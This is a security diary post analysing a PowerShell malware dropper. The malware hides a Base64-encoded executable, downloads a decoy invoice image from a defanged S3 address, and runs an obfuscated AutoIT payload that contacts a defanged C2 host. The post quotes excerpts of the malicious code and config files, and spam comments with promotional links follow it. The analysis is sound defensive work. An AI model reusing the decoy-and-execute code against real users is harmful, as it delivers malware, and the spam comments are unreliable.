Malicious Powershell using a Decoy Picture

Published: 2018-10-22
Last Updated: 2018-10-23 05:52:09 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

I found another interesting piece of malicious Powershell while hunting. The file size is 1.3MB and most of the file is a PE file Base64 encoded. You can immediately detect it by checking the first characters of the string:

$peString = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAA...'

“TVqQAA” indicates a PE file! Often, people think that Powershell must be heavily obfuscated to bypass antivirus engines. This is not always the case! The SHA256 hash is 53e954a7d36706d1f4951ca04b151055ded332e681a672e13e6cab634d74783d and the current VT score is only 3/56[1].

A first interesting feature is the Powershell detection to make the script run on multiple versions of Windows:

$osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;
$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";
$poshVersion = $PSVersionTable.PSVersion.Major;

But, what’s also interesting is the use of a decoy picture. The script downloads a fake invoice from an Amazon S3 bucket:

It displays it using the Start-Process cmdlet:

$decoyName = "$randomStr" + '.jpg';
$decoyURL = 'hxxp://s3.us-east-2.amazonaws[.]com/qeeqq/guru.jpg';
$decoyPath = "$env:APPDATA" + '\' + "$decoyName";
$webClient = New-Object System.Net.WebClient;
$webDownload = $webClient.DownloadFile($decoyURL, $decoyPath);
Start-Process $decoyPath;

What is interesting here, if you specify a non-executable file, Start-Process starts the program that is associated with the file, similar to the Invoke-Item cmdlet. So, the victim will see the picture using his/her preferred viewer! In the background, the executable is decoded and executed (SHA256:0e4c61741e81b3fa08df0622419fee5d350a67687fac76249b57eed89e129707 - VT score: 0). It drops a standard AutoIT3.exe file on disk into %APPDATA% and the corresponding script (SHA256:d5a8cdc7ae6a49233ee021a39f12ef61c630202f68edc3a7d64fd1b616704d8d - VT score: 0). The AutoIT script is obfuscated but not protected:

$ head -20 d5a8cdc7ae6a49233ee021a39f12ef61c630202f68edc3a7d64fd1b616704d8d.bad
#NoTrayIcon
Global Const $4063A0C69862A72A9 = 0x1
Global Const $53675A741B726EAC88522D14B9F334E1 = 24
Global Const $368080A29D90F5BA0B1D1E0DEAF11686 = 0xF0000000
Global Const $2BADE2A6917E4FD3141FF478399B9C29 = 0x0004
Global Const $D7B87DBC9EBFE9B98E86AC402AF30278 = 0x0002
Global Const $A4E74B3D571DD28A4BD46AFED2FF9A21 = 0x00000001
Global Const $B939F5E560A162C57C19FFD63367B64E = 1
Global Const $72C3DED1B4617DC9E36E9F0FA1ECD04B = 0x00008001
Global Const $B6D07C74BD5D1C5988597C22A366633F = 0x00008002
Global Const $AC23469B485C91685E66323634795BB3 = 0x00008003
Global Const $A2FCA4C08C8A3F1468D8E746E31AB5CB = 0x00008004
Global Const $487AA7ED5C22C2DBED5BE8784863E3CA = 0x00006603
Global Const $F23BABECD6E4A8BB507295A70C116B81 = 0x0000660e
Global Const $893529605D2CC4E08C633862AF17D045 = 0x0000660f
Global Const $D55A30AD6906FF18C3F0AD47673624E1 = 0x00006610
Global Const $D9E2A9D97C7FFBAD9D504886A359FB4A = 0x00006601
Global Const $4350DEA878C5E4A2BAB83C4406A8B26B = 0x00006602
Global Const $75A2FB145F3605CA0DA3CA48D7B9C281 = 0x00006801
Global Const $1295974546E6E9CA72B1205FD83C6F10 = 0

The initial PE file drops also a bunch of files:

Those files contain configuration data used by the AutoIT script. Example, the file 'qut.docx' contains obfuscated data:

$ head -20 qut.docx.bad
iZ5GeS7u6g62Hex92a7PUW44v3
lHy12Fo16eFem13k015VrSDJ65pa6cg416jGU2I06l9s
[Setting]
985P20
h46bQ48V3pDwlL37o9LL23c00j5e6T4Z592107YV8nL75
K3973xib52001GRn010J1j5i95
BDD0302a82XA2486P6x3N
HDX_Keys=433643363536343446464534374330344533414641454339363134443445433237354544314642383532364332463738
d93ek330eLihYI4s16gNW6bHL
9L017Z3795kB5vwg42XPik99D3h4It54862H16Pnt3uR4vrgxO7226HboT443S4321y29bHHM6wY9C178
0968s7P45e4V26E5npKuy7O32Tsi1XK681k0189u46K1Bk6im08k08F6hm7rS2q4aDiIP5cy284
GN22P2a20x0V11Q5
Keys=trx
dE5481u423Zv59D02ZM1z3f3r43cT371Ku1
1Nf0O3178c52668b
Dir=33623513
97JcnL
xs6vh880PP5875PC7IU3V1xSsEGkS992l9j2w8Ad4a79434pD9Rj6350ln
xH3x33W33h0255OD6C2UH2DN9JE7Q3v1Z9n03v38rnZ4s4GMps2VG646k-6LQh614D7m713LdoL3xa800561n7bkC5r74B2509cj1Y6656i5

In the AutoIT script, we can find:

$6D8EA853F0F9D4F4725A7B18BA8E68E5 = @ScriptDir & "\qut.docx"
$989BD8DF7434150DDDCC4E3AF84571E3 = IniRead($6D8EA853F0F9D4F4725A7B18BA8E68E5, "Setting", "Dir", '')
$9355FBBA246C8217C04EE3075C218909 = @TempDir & "\" & $989BD8DF7434150DDDCC4E3AF84571E3
Func _S0x325952AE1C47E8F062A74927A1DBE55B()
    $39EE801D7E22D21808919DD1A991F950 = IniRead($6D8EA853F0F9D4F4725A7B18BA8E68E5, "Setting", "msg", '')
    If $39EE801D7E22D21808919DD1A991F950 <> '' Then
        _S0xCD06933F8DF7350D8A7AA4D9F1BAFB5B()
    EndIf
    $4FE9C92D9445918D1759387A12138EA3 = IniRead($6D8EA853F0F9D4F4725A7B18BA8E68E5, "Setting", "_S0x20057179D673181B71D4593BFB2A0450", '')
    If $4FE9C92D9445918D1759387A12138EA3 <> '' Then
        _S0x20057179D673181B71D4593BFB2A0450()
    EndIf

The AutoIT script tries to contact xzit007[.]ddns[.]net (a DNS sinkhole is already in place) but I found 32 entries in passive DNS.

I'm still busy to analyze the script but does it ring a bell to you? Please share if you recognize this behaviour!

[1] https://www.virustotal.com/#/file/53e954a7d36706d1f4951ca04b151055ded332e681a672e13e6cab634d74783d/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)
ISC Stormcast For Monday, October 22nd 2018 https://isc.sans.edu/podcastdetail.html?id=6220

Comments

cwqwqwq
eweew<a href="https://www.seocheckin.com/edu-sites-list/">mashood</a>
WQwqwqwq[url=https://www.seocheckin.com/edu-sites-list/]mashood[/url]
dwqqqwqwq mashood
[https://isc.sans.edu/diary.html](https://isc.sans.edu/diary.html)
[https://isc.sans.edu/diary.html | https://isc.sans.edu/diary.html]
What's this all about ..?
password reveal .
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
https://thehomestore.com.pk/

Diary Archives